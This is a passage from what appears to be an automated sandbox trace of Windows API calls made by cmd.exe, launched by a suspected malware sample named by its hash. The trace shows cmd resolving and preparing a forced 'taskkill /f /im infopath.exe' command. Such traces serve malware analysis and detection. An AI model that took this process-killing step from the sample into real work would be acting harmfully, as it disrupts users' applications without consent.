out: lpBuffer="") returned 0x35 [0206.146] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0206.146] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0206.146] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0206.146] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0206.146] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0206.146] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0206.146] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0206.146] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0206.146] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0206.146] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0206.147] GetProcessHeap () returned 0x760000 [0206.147] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x768a10) returned 1 [0206.147] GetEnvironmentStringsW () returned 0x767fe8* [0206.147] GetProcessHeap () returned 0x760000 [0206.147] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa32) returned 0x76a8a0 [0206.147] FreeEnvironmentStringsA (penv="A") returned 1 [0206.147] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0206.147] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0206.148] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0206.148] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0206.148] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0206.148] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0206.148] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0206.148] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0206.148] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0206.148] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0206.148] GetProcessHeap () returned 0x760000 [0206.148] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x44) returned 0x7671b0 [0206.148] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0206.148] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0206.148] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0206.148] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x767200 [0206.149] FindClose (in: hFindFile=0x767200 | out: hFindFile=0x767200) returned 1 [0206.149] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x767200 [0206.149] FindClose (in: hFindFile=0x767200 | out: hFindFile=0x767200) returned 1 [0206.149] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0206.149] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x767200 [0206.149] FindClose (in: hFindFile=0x767200 | out: hFindFile=0x767200) returned 1 [0206.149] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0206.149] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0206.149] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0206.150] GetProcessHeap () returned 0x760000 [0206.150] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76a8a0) returned 1 [0206.150] GetEnvironmentStringsW () returned 0x767fe8* [0206.150] GetProcessHeap () returned 0x760000 [0206.150] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa76) returned 0x769e60 [0206.150] FreeEnvironmentStringsA (penv="=") returned 1 [0206.150] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0206.150] GetProcessHeap () returned 0x760000 [0206.150] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x7671b0) returned 1 [0206.151] GetProcessHeap () returned 0x760000 [0206.151] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x400e) returned 0x76bd60 [0206.151] GetProcessHeap () returned 0x760000 [0206.151] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7671b0 [0206.151] GetProcessHeap () returned 0x760000 [0206.151] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4008) returned 0x76fd78 [0206.151] GetProcessHeap () returned 0x760000 [0206.152] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4008) returned 0x773d88 [0206.153] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0206.153] GetProcessHeap () returned 0x760000 [0206.153] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x418) returned 0x76a8e0 [0206.154] SetErrorMode (uMode=0x0) returned 0x8003 [0206.154] SetErrorMode (uMode=0x1) returned 0x0 [0206.154] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x76a8e8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0206.154] SetErrorMode (uMode=0x8003) returned 0x1 [0206.154] GetProcessHeap () returned 0x760000 [0206.154] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x76a8e0, Size=0x7e) returned 0x76a8e0 [0206.154] GetProcessHeap () returned 0x760000 [0206.154] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x76a8e0) returned 0x7e [0206.154] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0206.154] GetProcessHeap () returned 0x760000 [0206.154] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x62) returned 0x767208 [0206.154] GetProcessHeap () returned 0x760000 [0206.154] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb8) returned 0x76a968 [0206.155] GetProcessHeap () returned 0x760000 [0206.155] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x76a968, Size=0x62) returned 0x76a968 [0206.155] GetProcessHeap () returned 0x760000 [0206.155] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x76a968) returned 0x62 [0206.155] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0206.155] GetProcessHeap () returned 0x760000 [0206.155] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe0) returned 0x76a9d8 [0206.159] GetProcessHeap () returned 0x760000 [0206.159] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x76a9d8, Size=0x76) returned 0x76a9d8 [0206.159] GetProcessHeap () returned 0x760000 [0206.159] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x76a9d8) returned 0x76 [0206.159] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.159] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im infopath.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0206.159] GetLastError () returned 0x3 [0206.160] GetProcessHeap () returned 0x760000 [0206.160] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76fd78) returned 1 [0206.160] GetProcessHeap () returned 0x760000 [0206.161] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x773d88) returned 1 [0206.161] GetProcessHeap () returned 0x760000 [0206.162] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76bd60) returned 1 [0206.162] GetConsoleOutputCP () returned 0x1b5 [0206.165] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0206.165] GetUserDefaultLCID () returned 0x409 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0206.166] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0206.167] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0206.167] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0206.167] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0206.167] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0206.168] GetProcessHeap () returned 0x760000 [0206.168] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20c) returned 0x76aaa0 [0206.168] GetConsoleTitleW (in: lpConsoleTitle=0x76aaa0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0206.170] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0206.170] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0206.170] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0206.171] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0206.171] GetProcessHeap () returned 0x760000 [0206.171] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x400a) returned 0x76bd60 [0206.171] GetProcessHeap () returned 0x760000 [0206.171] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76bd60) returned 1 [0206.172] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0206.172] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0206.172] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0206.172] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0206.172] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0206.172] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0206.172] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0206.172] GetProcessHeap () returned 0x760000 [0206.172] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x58) returned 0x76acb8 [0206.173] GetProcessHeap () returned 0x760000 [0206.173] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1a) returned 0x767278 [0206.173] GetProcessHeap () returned 0x760000 [0206.173] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x34) returned 0x76ad18 [0206.174] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0206.176] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0206.176] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0206.176] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0206.176] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0206.176] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0206.176] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0206.176] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0206.176] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0206.176] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0206.176] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0206.176] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0206.176] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0206.176] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0206.176] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0206.176] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0206.176] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0206.176] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0206.176] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0206.176] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0206.176] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0206.177] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0206.177] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0206.177] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0206.177] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0206.177] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0206.177] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0206.177] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0206.177] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0206.177] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0206.177] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0206.177] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0206.177] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0206.177] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0206.177] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0206.177] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0206.177] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0206.177] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0206.177] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0206.177] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0206.177] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0206.177] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0206.177] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0206.177] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0206.178] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0206.178] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0206.178] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0206.178] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0206.178] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0206.178] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0206.178] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0206.178] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0206.178] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0206.178] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0206.178] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0206.178] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0206.178] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0206.178] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0206.178] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0206.178] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0206.178] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0206.178] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0206.178] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0206.178] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0206.178] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0206.178] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0206.178] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0206.178] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0206.178] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0206.178] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0206.178] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0206.178] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0206.178] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0206.179] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0206.179] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0206.179] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0206.179] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0206.179] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0206.179] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0206.179] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0206.179] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0206.179] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0206.179] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0206.179] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0206.179] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0206.179] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0206.179] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0206.179] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0206.179] GetProcessHeap () returned 0x760000 [0206.179] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x210) returned 0x76ad58 [0206.179] GetProcessHeap () returned 0x760000 [0206.179] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x46) returned 0x76af70 [0206.180] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0206.180] GetProcessHeap () returned 0x760000 [0206.180] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x418) returned 0x7605c8 [0206.180] SetErrorMode (uMode=0x0) returned 0x8003 [0206.180] SetErrorMode (uMode=0x1) returned 0x0 [0206.180] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7605d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0206.180] SetErrorMode (uMode=0x8003) returned 0x1 [0206.180] GetProcessHeap () returned 0x760000 [0206.180] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x7605c8, Size=0x56) returned 0x7605c8 [0206.180] GetProcessHeap () returned 0x760000 [0206.180] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x7605c8) returned 0x56 [0206.180] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0206.180] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.180] GetProcessHeap () returned 0x760000 [0206.180] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x110) returned 0x76afc0 [0206.181] GetProcessHeap () returned 0x760000 [0206.181] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x218) returned 0x760628 [0206.185] GetProcessHeap () returned 0x760000 [0206.185] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x760628, Size=0x112) returned 0x760628 [0206.185] GetProcessHeap () returned 0x760000 [0206.185] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x760628) returned 0x112 [0206.185] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0206.186] GetProcessHeap () returned 0x760000 [0206.186] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe0) returned 0x76b0d8 [0206.195] GetProcessHeap () returned 0x760000 [0206.195] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x76b0d8, Size=0x76) returned 0x76b0d8 [0206.195] GetProcessHeap () returned 0x760000 [0206.195] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x76b0d8) returned 0x76 [0206.195] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.196] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0206.197] GetLastError () returned 0x2 [0206.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x76b158 [0206.197] GetProcessHeap () returned 0x760000 [0206.197] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x767760 [0206.197] FindClose (in: hFindFile=0x76b158 | out: hFindFile=0x76b158) returned 1 [0206.197] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0206.198] GetLastError () returned 0x2 [0206.198] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x76b158 [0206.198] GetProcessHeap () returned 0x760000 [0206.198] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x767760, Size=0x4) returned 0x767e90 [0206.198] FindClose (in: hFindFile=0x76b158 | out: hFindFile=0x76b158) returned 1 [0206.198] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0206.198] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0206.198] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0206.201] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0206.201] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0206.201] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158)) [0206.201] GetProcessHeap () returned 0x760000 [0206.201] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x767700 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.201] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.202] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.202] 